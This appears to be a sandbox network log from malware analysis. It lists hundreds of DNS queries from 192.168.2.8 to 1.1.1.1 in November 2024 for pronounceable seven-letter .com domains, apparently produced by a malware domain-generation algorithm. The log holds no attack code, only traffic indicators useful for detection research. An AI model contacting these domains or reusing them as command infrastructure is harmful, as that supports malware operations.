                                                                                                                                                                                                              Nov 11, 2024 18:33:21.298646927 CET192.168.2.81.1.1.10x1055Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.299129009 CET192.168.2.81.1.1.10x6b89Standard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.299304008 CET192.168.2.81.1.1.10xd426Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.299707890 CET192.168.2.81.1.1.10x998bStandard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.299877882 CET192.168.2.81.1.1.10xd0eaStandard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.300041914 CET192.168.2.81.1.1.10xdf85Standard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.300255060 CET192.168.2.81.1.1.10x5128Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.306648970 CET192.168.2.81.1.1.10xc48aStandard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.306845903 CET192.168.2.81.1.1.10x5c9eStandard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.308458090 CET192.168.2.81.1.1.10x60caStandard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.314399004 CET192.168.2.81.1.1.10xd6cbStandard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.316046953 CET192.168.2.81.1.1.10x5570Standard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.316287994 CET192.168.2.81.1.1.10x5399Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.316488028 CET192.168.2.81.1.1.10xcd6Standard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.318314075 CET192.168.2.81.1.1.10x893eStandard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.318550110 CET192.168.2.81.1.1.10x8b1eStandard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.318744898 CET192.168.2.81.1.1.10xf4dcStandard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.318978071 CET192.168.2.81.1.1.10x439eStandard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.319235086 CET192.168.2.81.1.1.10x8fa7Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.319390059 CET192.168.2.81.1.1.10xe62aStandard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.321381092 CET192.168.2.81.1.1.10x6803Standard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.321418047 CET192.168.2.81.1.1.10x204aStandard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.321702003 CET192.168.2.81.1.1.10xe2c0Standard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.322758913 CET192.168.2.81.1.1.10x89cfStandard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.324122906 CET192.168.2.81.1.1.10x55dfStandard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.324361086 CET192.168.2.81.1.1.10x7dceStandard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.324372053 CET192.168.2.81.1.1.10x6219Standard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.324587107 CET192.168.2.81.1.1.10x5d6fStandard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.324615002 CET192.168.2.81.1.1.10xf8c9Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.324748039 CET192.168.2.81.1.1.10x5122Standard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.324801922 CET192.168.2.81.1.1.10x9ebaStandard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.324930906 CET192.168.2.81.1.1.10x5879Standard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.325004101 CET192.168.2.81.1.1.10x31fbStandard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.325109005 CET192.168.2.81.1.1.10xe4c2Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.325247049 CET192.168.2.81.1.1.10x5053Standard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.325515032 CET192.168.2.81.1.1.10xb66Standard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.325653076 CET192.168.2.81.1.1.10xecc5Standard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.325722933 CET192.168.2.81.1.1.10xa69cStandard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.325879097 CET192.168.2.81.1.1.10x6d12Standard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.326041937 CET192.168.2.81.1.1.10x501aStandard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.326163054 CET192.168.2.81.1.1.10x6c1bStandard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.326193094 CET192.168.2.81.1.1.10x6c46Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.944096088 CET192.168.2.81.1.1.10xaf5fStandard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.944717884 CET192.168.2.81.1.1.10xf0a1Standard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.945821047 CET192.168.2.81.1.1.10xad38Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.946861982 CET192.168.2.81.1.1.10xe726Standard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.947215080 CET192.168.2.81.1.1.10x56dfStandard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.951746941 CET192.168.2.81.1.1.10x9649Standard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.952398062 CET192.168.2.81.1.1.10x8637Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.953269005 CET192.168.2.81.1.1.10xac6dStandard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.953361034 CET192.168.2.81.1.1.10x6f4aStandard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.953924894 CET192.168.2.81.1.1.10xc06bStandard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.954046965 CET192.168.2.81.1.1.10x6136Standard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.954631090 CET192.168.2.81.1.1.10x5389Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.954873085 CET192.168.2.81.1.1.10xf7b3Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.955485106 CET192.168.2.81.1.1.10xacadStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.956785917 CET192.168.2.81.1.1.10x3f90Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.957055092 CET192.168.2.81.1.1.10xd5b6Standard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.957653999 CET192.168.2.81.1.1.10xe1e8Standard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.957914114 CET192.168.2.81.1.1.10x3690Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.960710049 CET192.168.2.81.1.1.10xf2d3Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.960927010 CET192.168.2.81.1.1.10x7aaStandard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.963126898 CET192.168.2.81.1.1.10x9490Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.965090990 CET192.168.2.81.1.1.10x50bfStandard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.965965986 CET192.168.2.81.1.1.10x4a1aStandard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.968147993 CET192.168.2.81.1.1.10x3d88Standard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.980508089 CET192.168.2.81.1.1.10x88e9Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.006349087 CET192.168.2.81.1.1.10x99b4Standard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.006551981 CET192.168.2.81.1.1.10x69bdStandard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.019170046 CET192.168.2.81.1.1.10xce39Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.026352882 CET192.168.2.81.1.1.10x5b48Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.027265072 CET192.168.2.81.1.1.10xec6aStandard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.028527975 CET192.168.2.81.1.1.10xdf87Standard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.029067993 CET192.168.2.81.1.1.10x5a48Standard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.030282974 CET192.168.2.81.1.1.10x3e76Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.031085014 CET192.168.2.81.1.1.10xa93Standard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.033715963 CET192.168.2.81.1.1.10x6827Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.037092924 CET192.168.2.81.1.1.10xf43Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.037820101 CET192.168.2.81.1.1.10x85baStandard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.127598047 CET192.168.2.81.1.1.10x12c5Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.128834009 CET192.168.2.81.1.1.10xdec0Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.129333973 CET192.168.2.81.1.1.10xe87dStandard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.130050898 CET192.168.2.81.1.1.10x386bStandard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.138386965 CET192.168.2.81.1.1.10x749eStandard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.138570070 CET192.168.2.81.1.1.10xab5eStandard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.138730049 CET192.168.2.81.1.1.10x7b1Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.139041901 CET192.168.2.81.1.1.10x2e40Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.144490004 CET192.168.2.81.1.1.10x85a7Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.150861025 CET192.168.2.81.1.1.10x36f2Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.157080889 CET192.168.2.81.1.1.10xd257Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.158325911 CET192.168.2.81.1.1.10x1526Standard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.158492088 CET192.168.2.81.1.1.10xf0c0Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.158632994 CET192.168.2.81.1.1.10x5904Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.169543028 CET192.168.2.81.1.1.10xa713Standard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.170636892 CET192.168.2.81.1.1.10x3cbfStandard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.171829939 CET192.168.2.81.1.1.10x85c7Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.203437090 CET192.168.2.81.1.1.10xc22dStandard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.368913889 CET192.168.2.81.1.1.10x4cc8Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.594228983 CET192.168.2.81.1.1.10xcea6Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.595463037 CET192.168.2.81.1.1.10xcb9fStandard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.599419117 CET192.168.2.81.1.1.10xc8f6Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.599446058 CET192.168.2.81.1.1.10xadeStandard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.599642038 CET192.168.2.81.1.1.10xe05aStandard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.599888086 CET192.168.2.81.1.1.10x66edStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.606307030 CET192.168.2.81.1.1.10x6c4Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:22.806651115 CET192.168.2.81.1.1.10x8560Standard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.837889910 CET192.168.2.81.1.1.10x56edStandard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.839499950 CET192.168.2.81.1.1.10xff9fStandard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.840270996 CET192.168.2.81.1.1.10x6101Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.840897083 CET192.168.2.81.1.1.10x8bcfStandard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.842861891 CET192.168.2.81.1.1.10x4404Standard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.843661070 CET192.168.2.81.1.1.10x3b5cStandard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.990627050 CET192.168.2.81.1.1.10xefadStandard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.991050005 CET192.168.2.81.1.1.10xc38Standard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.991381884 CET192.168.2.81.1.1.10xe2c8Standard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.991724014 CET192.168.2.81.1.1.10x83b4Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.992065907 CET192.168.2.81.1.1.10x9435Standard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.992726088 CET192.168.2.81.1.1.10xafe3Standard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.993120909 CET192.168.2.81.1.1.10x5259Standard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.993721008 CET192.168.2.81.1.1.10x4bdfStandard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.994528055 CET192.168.2.81.1.1.10x4e20Standard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.995191097 CET192.168.2.81.1.1.10xbec4Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.996001005 CET192.168.2.81.1.1.10x2784Standard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.996814013 CET192.168.2.81.1.1.10x959aStandard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.997270107 CET192.168.2.81.1.1.10x7f9eStandard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.998071909 CET192.168.2.81.1.1.10x6b15Standard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.998842955 CET192.168.2.81.1.1.10xdb0dStandard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.999516010 CET192.168.2.81.1.1.10x2ebfStandard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:23.999965906 CET192.168.2.81.1.1.10x39c1Standard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.000783920 CET192.168.2.81.1.1.10xb349Standard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.001247883 CET192.168.2.81.1.1.10xa76eStandard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.001832962 CET192.168.2.81.1.1.10x2bc0Standard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.134793043 CET192.168.2.81.1.1.10x8a3aStandard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.139256001 CET192.168.2.81.1.1.10xcb70Standard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.142085075 CET192.168.2.81.1.1.10xaafdStandard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.142822981 CET192.168.2.81.1.1.10xe24dStandard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.143276930 CET192.168.2.81.1.1.10x55feStandard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.143940926 CET192.168.2.81.1.1.10xcff1Standard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.145558119 CET192.168.2.81.1.1.10x36fbStandard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.146262884 CET192.168.2.81.1.1.10x2716Standard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.179073095 CET192.168.2.81.1.1.10x9402Standard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.180536985 CET192.168.2.81.1.1.10xc4aStandard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.180965900 CET192.168.2.81.1.1.10x90ceStandard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.181166887 CET192.168.2.81.1.1.10xb850Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.181207895 CET192.168.2.81.1.1.10x9e79Standard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.181339025 CET192.168.2.81.1.1.10xb980Standard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.181509018 CET192.168.2.81.1.1.10x79d5Standard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.181603909 CET192.168.2.81.1.1.10x9cadStandard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.181757927 CET192.168.2.81.1.1.10x3ff9Standard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.181849003 CET192.168.2.81.1.1.10xd6ccStandard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.181900024 CET192.168.2.81.1.1.10x2614Standard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.182065964 CET192.168.2.81.1.1.10x7e6cStandard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.182065964 CET192.168.2.81.1.1.10xac61Standard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.182218075 CET192.168.2.81.1.1.10x31ccStandard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.182351112 CET192.168.2.81.1.1.10x65ccStandard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.182683945 CET192.168.2.81.1.1.10x910eStandard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.182858944 CET192.168.2.81.1.1.10xb145Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.186080933 CET192.168.2.81.1.1.10x4409Standard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.186207056 CET192.168.2.81.1.1.10x77b7Standard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.186306000 CET192.168.2.81.1.1.10xedefStandard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.186400890 CET192.168.2.81.1.1.10x4ab8Standard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.186505079 CET192.168.2.81.1.1.10xe4efStandard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.186666012 CET192.168.2.81.1.1.10x4479Standard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.186820030 CET192.168.2.81.1.1.10xd787Standard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.187247038 CET192.168.2.81.1.1.10x70e5Standard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.187403917 CET192.168.2.81.1.1.10x7311Standard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.188705921 CET192.168.2.81.1.1.10x127aStandard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.188914061 CET192.168.2.81.1.1.10x479Standard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.188967943 CET192.168.2.81.1.1.10xe8e8Standard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.189263105 CET192.168.2.81.1.1.10x7876Standard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.614483118 CET192.168.2.81.1.1.10x5272Standard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.625607967 CET192.168.2.81.1.1.10xc45aStandard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.626497984 CET192.168.2.81.1.1.10x9b66Standard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.629569054 CET192.168.2.81.1.1.10xfa79Standard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.633028030 CET192.168.2.81.1.1.10x7f21Standard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.649264097 CET192.168.2.81.1.1.10x205eStandard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.656027079 CET192.168.2.81.1.1.10xa536Standard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.656733036 CET192.168.2.81.1.1.10xd294Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.669650078 CET192.168.2.81.1.1.10x2e4cStandard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.675493002 CET192.168.2.81.1.1.10xff5aStandard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.678437948 CET192.168.2.81.1.1.10x915Standard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.680131912 CET192.168.2.81.1.1.10x5d4Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:25.680744886 CET192.168.2.81.1.1.10x5ebcStandard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
